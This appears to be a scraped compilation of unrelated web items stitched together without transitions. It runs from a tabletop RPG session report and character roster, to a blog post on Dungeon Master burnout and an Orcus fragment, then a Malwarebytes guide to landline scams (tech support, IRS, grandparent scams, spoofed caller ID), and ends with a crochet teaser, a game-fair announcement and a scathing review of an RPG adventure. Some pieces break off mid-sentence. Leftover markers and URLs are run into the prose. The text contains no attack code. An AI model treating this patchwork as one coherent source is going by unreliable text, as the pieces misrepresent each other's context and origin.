Part I) Huang would use his Monk ability to "Improvise Weapon" which allows a Monk to turn virtually any ordinary object into a weapon. Examples include chopsticks, chairs, clothing, dead animals, and shoelaces . So Honda improvised his plus 3 Ring of Protection. Thus using incontrovertible Player logic by declaring a plus 3 defensive magic item becomes a plus 3 magic weapon!

(I think the emphasis should be on the word "ordinary", since a Plus 3 Ring of Protection is not "ordinary". But I digress.)

Part II) Huang would use his Monk ability of "Weapon Strike" with his "Improvised Weapon" to target the Pit Fiend's Jagged Club and Wicked Scourge. Thus destroying the Pit Fiend's weapons, forcing him to use his Claws. (As Gnomex cast his Protection from Evil spell above, he would thus be protected, should the Pit Fiend arrive.)

Of course Huang destroyed both the weapons of the Pit Fiend's weapons in two strikes. Also during the round the Pit Fiend made a fumble.

Nonplussed, the Pit Fiend decided to fly over Huang towards Honda and Gnomex. Huang made one more pass at the Pit Fiend as it flew over with his "improvised plus 3 weapon" and caused a few points of damage.

To be continued next session...

++++ OUT OF CHEESE ERROR ++++

BT

BBBB

PART 2.

++++ CHARACTER ROSTER ++++

CHARACTERS
Grok the Dwarf, a third level WitchRanger (Battlemage subclass of Magic User).
Aerys, an Elvariel, a Fingersmith (Thief class).
Baronet Huang - a Master of the West Wind of the Stone Tiger Order, (Monk class).
Numrendir - a human Conjurist (a Conjuror, Magic User subclass)
Junkbot Jackson - a human Tracker/Friar (a Ranger 5th and Cleric 6th level).

NPCs/Proteges:
Baronetess Honda - a Human Datai Samurai, Steward of Catan (formerly Temple of the Frog)
Gnomex, a Gnome Adept of Geardal Ironhand (Cleric class.)
Tanzen - a Fae-Born first level Exciter. (Fourth level Invoker, a Magic User subclass).
Fundisha - a half-Elf Swordsperson/Tout (Fighter and Infiltrator, a Thief subclass).

CAPTURED CHARACTERS (both PCs and NPCs)
Gerry Castagere, human Fingersmith, (Thief class) and ever loving devotee of Elefus, abandoned to the Blood Cult in the City of Brass on the Plane of Fire.

MISSING/OFFLINE/RETIRED CHARACTERS
Count Elefus, a human Abbot of Heimdall (Cleric class). RETIRED
Felipe the Dwarf, a third level Sigil (Chosen One subclass of Cleric).
Jacko, an Albino Dork Elf, a Master Espion (Infiltrator, subclass of Thief).
Serena 2.0 - First Level Battle Mage Second (a Protege of Jacko).
Sir Weasel, human Guild Soldier, Warlock, & Champion (Thief, Magic User, & Fighter classes) he stayed back in BlackMoor.
- and nine Pilgrim henchmen of various levels. (They wear hoodies.)
Slade Wilson - Dwarven Professional (a Bounty Hunter, Fighter subclass) Left behind at Catan.

BT

BBBB

++++ RECORD KEEPING ++++

PART 3.

This is also posted on three forums, and a blog.
http://blackmoor.mystara.net/forums/viewforum.php?f=76
http://www.furiouslyeclectic.com/forum/f...php?fid=13
http://www.kenzerco.com/forums/forumdisp...ster-Tales
http://furiouslyeclectic.com/hackmoor/

--

Tracy Johnson
Old fashioned text games hosted below:
http://empire.openmpe.com/empire/
BT

NNNN

image_blog: tweetbutton: Tweet

It has happened to us all. You scheduled the game weeks ago. It is finally here. You just worked a gazillion hours or were up to a million o’clock the night before. You are tired, not in the mood, but don't want to cancel the game. After all, it is super hard to get the gang together!

Everyone arrives. You catch up, since you have not interacted which each other beyond social media. Some time passes and everyone is finally ready to start. You feel a little better now, a tad more relaxed. An hour into the game you have the 1000-mile stare. You start hand waving things you should not. Monster stats become meaningless. Hell, you just want them to die and the game to end.

Someone is building dice towers. Maybe someone else is on his or her phone. There is almost definitely someone doodling. Yikes, can you salvage this? Yes, you can! Remember Dungeons & Dragons is a storytelling game. If you are tired and the game is dragging, it is time to get back to basics. Referencing character sheets and rules minutia is enough to cast a Sleep Spell on anyone.

I have been though the scenario outlined above many times. To escape the mire I developed some tools to get me back on track. The first one is a character card. On it, I have bullet points, which detail the motivations, goals, quirks, and weaknesses of each character. When things start to drag, or the scenario I prepared is not turning out great, I turn to those cards. After all this is their story, and you are just helping to direct it.

Players will immediately perk up when suddenly passed the story ball. I have to tell you, that energy at the game table is very contagious. As Dungeon Master, you should be on the lookout for when the players pass you the story ball also. That cool idea they just came up with? Go with it! Especially if you are feeling session burnout and things are bland.

Nothing is more exciting than when the players take the story in some unexpected direction. It is fun to be surprised as the Dungeon Master occasionally. That is the essence of collaborative story telling. It makes you not have to do all the heavy lifting, especially if you are having an off night.

Another technique I use when tired is intravenous coffee. OK, jokes aside I have yet another set of cards on hand. On them, I have detailed in one paragraph or less, various colorful NPCs and points of interest. These immediately create a “shiny” for the players to latch onto. Some are outlandish, like a kobold selling dyed scarfs in the middle of the dungeon, whoa…what is her story? Others are just fascinating, like the countenance of a man upon the door of a rotted cottage, his eyes almost lifelike.

When dreaming these up I have no idea where they may go. This is by design. I have even run entire game sessions this way, setting aside my original plans. They have created some of the most memorable encounters. However, most importantly they helped to get this tired Dungeon Master back on track. I hope this post inspires you with some of these ideas. In the instances where life has you failing your tired save, the game sessions are salvageable. You just need to jump-start your engine!

If these solutions don’t work for you, it may be best to end your game early and regroup at a later date. It is definitely not worth forging on if everyone is not having a good time. If you are experiencing dungeon master burnout constantly, it may be time for a break. Maybe schedule a board game night. Alternatively, switch things up and run a low crunch one shot to rekindle that game master fire.  For some it may be simple as handing over the reins to another game master for a while.

If you have any tips or tricks to bounce back from a dragging game session, please feel free to share! Just remember the challenge not unique to you. We all have been there!

Sleep Spell - Larry Elmore (1983)

Orcus the name conjures up images of the roiling chaos of the Abyss and within certain esoteric grimoires the secret teachings of the demon lord are revealed. The pen & the promise are given to certain upper strata pf society citizens in modern cities where the name of the demon lord are unknown to the average person. The promise of the right of rulership of the mace & the pleasures of the Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0

It’s time to have “the talk” with your parents, relatives, and loved ones. Anyone still using a landline must be warned: having a home phone makes you particularly vulnerable to scams.

We know here at Malwarebytes that our readers are often the unofficial “IT” department for their families, relatives, and friends. While suggesting to your folks that they discontinue having a landline might not go over well, we still need them to at least be wary of that telephone and the types of calls they might receive on it.

What was once an essential communication tool is now a gateway into your home—a scam delivery mechanism.

Looking at all the inbound calls that my relatives with landlines were receiving left me with a sneaky suspicion that they must have landed on a “victim list” of sorts. Types of scam calls included:

• Tech support scams (as many as several times a day)
• Robocalls
• Charity requests (some more dubious than others)
• Political calls
• Surveys
• IRS/Bank/FBI/Police scams (more tax scams during tax season)

While they do not wish to part with their landlines, I have investigated some other possible solutions for my relatives to avoid scams.

I found some call blocker hardware. However, reviews indicated that this wasn’t particularly effective against scammers. For example, this solution wouldn’t stop tech support scammers that spoof residential numbers.

I also found another device that requires a password before allowing the phone to ring from all inbound calls.

Neither of these felt like an acceptable solution.

Ultimately, knowledge is power, so I’m choosing to explain all the scams that they encountered. In addition, I’d like to point out our tech support scam resource page.

Microsoft tech support

The standard, tried and true tech support scam. These are either initiated from a cold call, “Hi, I’m from Microsoft!” or by driving potential victims to make a call to “Microsoft tech support” themselves after being served a malicious pop-up or browser locker with the specific intent of tricking users into thinking their computer is infected. and they need to pay tech support to fix it.

This scam has many variants. The scammers will claim to be the official support for any number of security products. They will try to impersonate Microsoft or other antivirus companies. They have even tried to impersonate Malwarebytes.

There’s a simple fix for this scam. If you get a call from “Microsoft,” hang up immediately. They will never call you. There is no “Internet Tech Support,” and your connection is not monitored for emanating threats.

Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.

Unfortunately, most scammers have now switched to pop-ups driving the victims to initiate the call. Even worse, browlocks or browser lockers that effectively prevent further use of the computer is on the rise.

Banks, FBI, police, and the IRS

Scammers will impersonate institutions of authority.

These types of institutions almost never call. If they do, simply ask for their name and their department, and inform them you will call them right back. If they politely say they understand and give you their information, there is a good chance this is a legitimate call. (Keep in mind that it is extraordinarily rare for the FBI, banks, IRS, or police to initiate a call.)

Use the Internet to double-check the number to call back. The scammers may try to be helpful and provide you with theirs, but a quick Google search of their phone number can tell you where they’re calling from (and if that matches with where their company headquarters is located).

If the person on the other end of the line gets angry or starts threatening you, guess what? They’re a scammer. Remember, they’re trying to instill in you a sense of urgency in order to override your common sense.

Stranded grandchildren

An especially heinous scam, this variant targets grandparents using classic psychological manipulation. The scenario is that their grandchild is calling from jail, arrested for disorderly conduct, and this is their one phone call. Sense of urgency? Check. Fear for a loved one? Check. Common sense thrown out the window? Check.

This scam usually tries to get Grandma to send money “for bail” via MoneyGram or Western Union.

So what happens if you get a call from someone claiming to be your grandchild stuck in jail? Well, much of this scam relies on grandparents being less in-the-know about their grandkids. Do they know what her voice sounds like? Her phone number? Would she never be arrested for disorderly conduct?

If you don’t know for sure, verify with other family members. Text the child’s parents while on the landline with her. Confirm that the family member is who she claims to be by asking personal questions only the relative would know. Scammers will try to fudge through details. Some might start crying. Again, the sense of urgency is pivotal in this scam.

Remember this: If your grandchild were truly in trouble and in jail, would you be the one person she would call? If that’s true, then you’d know if it were her on the other end of the line within seconds. If you’re not her go-to person, then it’s fair to ask more questions and to check in with other family members about the legitimacy of the call. You can even hang up and call back your grandchild on her cell. Chances are, she’ll pick up and have no idea who called you just now.

Caller ID is bunk

Nowadays, you can’t just trust that your caller ID will flag suspicious numbers. The responsibility of caller ID lies with the originating call. And if that caller is a scammer, then they know caller ID is trivial to spoof. Scammers have long since figured out how to spoof numbers so that it appears they’re coming from a familiar, local area code, as it greatly increases their chances at a successful scam. Both the Microsoft tech support call and the fake IRS calls use spoofed caller ID.

I demonstrated how easy spoofing was by using an app on my phone and making a call that appeared to originate from somewhere else. For a technical explanation of how caller ID spoofing works, check out this YouTube video.

TLDR

• Never allow anyone remote access to your computer.
• Is there a pitch for a product/service/subscription? It’s probably a scam.
• Is there a sense of urgency? IRS + “you will go to jail!” = scam!
• Caller ID is bunk. Don’t trust it.
• No legitimate institutions will want Apple iTunes cards or any other gift card as a payment form.

When it comes to using a land line, I don’t think there’s an ideal solution—one that guarantees 100 percent safety. However, armed with the right amount of knowledge, users can easily fend off scams—and stop being afraid of their phone.

Do you know someone who still has a landline? Have you had to explain scams to your relatives? Ever encounter any different scams than the one mentioned by phone? Please don’t hesitate to share your stories with us in the comments.

The post PSA: Users with landlines are more vulnerable to scams appeared first on Malwarebytes Labs.

The Super Easy Non-Slip Pom Pom Rug is… well… super easy to crochet! Only the most beginning stitches are used, making this pattern perfect for crocheters of any skill level. The yarn used does require a few tips and tricks though – so I’ve put together right and left-handed pom pom rug tutorials for the Super [...]

The post Super Easy Non-Slip Pom Pom Rug Tutorial appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

2

Cryptozoic Entertainment today announced that it will showcase current and upcoming games at Origins Game Fair, June 13-17 at the Greater Columbus Convention Center. At Booth #C201, Cryptozoic will demo Rick and Morty: The Pickle Rick Game, Pantone™: The Game, DC Spyfall, and much more. It will also sell several games, including Rick and Morty: The Ricks Must Be Crazy Multiverse Game, Million Dollars, But… The Game, GKR: Heavy Hitters, and The Walking Dead: No Sanctuary — The Board Game, as well as limited prelease quantities of Wallet and DC Deck-Building Game Crossover Pack 7: New Gods.

By Ken Goudsward
Dimensionfold Games
Goldensword/Generic
Entry Level

Our adventurers are commissioned by the Jarl of Connaught to investigate strange weather phenomenon at Bald Mountain. The Jarl also sends his personal mage to accompany them.

I don’t even know where to start on this one.

This 24 page adventure details a short overland journey to a ruined keep on top of a mountain with a wizard in it. The keep has ten rooms and has two monsters: the wizard and his fighter buddy. Single column, sparse, and yet with 24 pages … there’s just nothing here. Condensing this to a one page dungeon would still leave ¾ of a page to spare.

The jarl charges you with getting to the bottom of the weird weather coming from the top of the mountain. He gives you a sword and some armor. He sends his mage with you. (Ug. NPC with the party means betrary by him and/or DM pet. And in this case it’s a party betrayal.) You wander up a mountain for a day, find a ruined keep that is mostly empty, and fight a wizard. Everything here is more than little off.

Take the overland. The mountain is eight hours away, walking. Each hour you have an encounter on the wandering animal table. “Woah!” I thought, way too much. Foolish me. The encounters involve flies, mosquitos, crows, grouse, rabbits, deer, geese, a falcon, etc. I was then surprised there was no wandering rock table.

Once again, the adventure should concentrate on player interactivity. The mundane has little place. Wanna set the mood, or foreshadow? Great, no problem. Roll on table 12 each hour to see what kind of gravel the road is made of that hour? No. This is a caricature of D&D and, much like the rest of this adventure, reminds me of fantasy heartbreakers. Someone’s got a bug up their ass about how things should be.

“The team will need to gain entry into the keep. The keep can be entered easily from the east, north, or west.” *sigh* And does the sun rise today also?

The keep, proper, has two levels and ten rooms. “R3: (Servants quarters) (dark-empty torch sconce) 3 beds, only 1 with blankets; 1 dresser with shabby clothes” Fucking wonderful. My life is now complete. I never knew what I was missing. This is adventure? This is value? This is supposed to help you run a good game for your players? Yeah, it doesn’t overstay its welcome, but it also doesn’t DO anything. Room after room is like this. Well, at least all ten rooms, that is.

The adventure ends on page ten, after starting on page four, with the Boss Fight. It’s labeled The Boss Fight. It’s one page long, with TOO much whitespace, and full of tactics for the evil bad guy wizard. The rest of the page count is monster stats, tables, etc. Any EVERYTHING is in single column “i wrote this in word and printed in PDF” format.

There’s just nothing here. It would make, at best, a quarter to half a page of a one page dungeon. I get “slow burn”, but this is a little silly.

This is Pay What You Want at DriveThru, with a current suggested price of $3. The preview shows you the entire adventure. Enjoy, in particular, the boss fight on page ten. Or maybe the adventure design on pages two and three.
http://www.drivethrurpg.com/product/242468/the-Wizard-of-Bald-Mountain